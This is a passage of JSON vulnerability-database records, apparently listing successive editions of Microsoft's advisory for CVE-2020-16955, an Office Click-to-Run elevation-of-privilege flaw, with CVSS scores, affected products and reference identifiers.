update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2020-10-22T11:06:23", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2020-10-22T11:06:23", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2020-10-22T11:06:23", "rev": 2}}, "objectVersion": "1.4", "kbList": ["KBClick to Run", "KBNone"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"kb": "KBClick to Run", "kbSupersedence": "KBNone", "msplatform": "", "name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions"}, {"kb": "KBClick to Run", "kbSupersedence": "KBNone", "msplatform": "", "name": "Microsoft 365 Apps for Enterprise for 32-bit Systems"}, {"kb": "KBClick to Run", "kbSupersedence": "KBNone", "msplatform": "", "name": "Microsoft 365 Apps for Enterprise for 64-bit Systems"}, {"kb": "KBClick to Run", "kbSupersedence": "KBNone", "msplatform": "", "name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions"}, {"kb": "KBClick to Run", "kbSupersedence": "KBNone", "msplatform": "", "name": "Microsoft Office 2019 for 64-bit editions"}, {"kb": "KBClick to Run", "kbSupersedence": "KBNone", "msplatform": "", "name": "Microsoft Office 2019 for 32-bit editions"}], "vendorCvss": {}}, "lastseen": "2020-10-22T11:06:23", "differentElements": ["href", "kbList", "msAffectedSoftware"], "edition": 2}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "1bd2b49eb9a71007d55b94cf4706a80d", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-03-18T19:15:00", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-03-18T19:15:00", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-03-18T19:15:00", "rev": 2}}, "objectVersion": "1.5", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-03-18T19:15:00", "differentElements": ["cvss2", "cvss3"], "edition": 3}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-07-28T20:07:00", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-07-28T20:07:00", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-07-28T20:07:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-07-28T20:07:00", "differentElements": ["msAffectedSoftware"], "edition": 4}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-03T18:46:41", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-03T18:46:41", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-03T18:46:41", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-03T18:46:41", "differentElements": ["msAffectedSoftware"], "edition": 5}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-03T20:42:18", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-03T20:42:18", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-03T20:42:18", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-03T20:42:18", "differentElements": ["msAffectedSoftware"], "edition": 6}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-04T06:47:13", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-04T06:47:13", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-04T06:47:13", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T06:47:13", "differentElements": ["msAffectedSoftware"], "edition": 7}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-04T08:47:11", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-04T08:47:11", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-04T08:47:11", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T08:47:11", "differentElements": ["msAffectedSoftware"], "edition": 8}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-04T14:45:52", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-04T14:45:52", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-04T14:45:52", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T14:45:52", "differentElements": ["msAffectedSoftware"], "edition": 9}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-04T16:51:10", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-04T16:51:10", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-04T16:51:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", 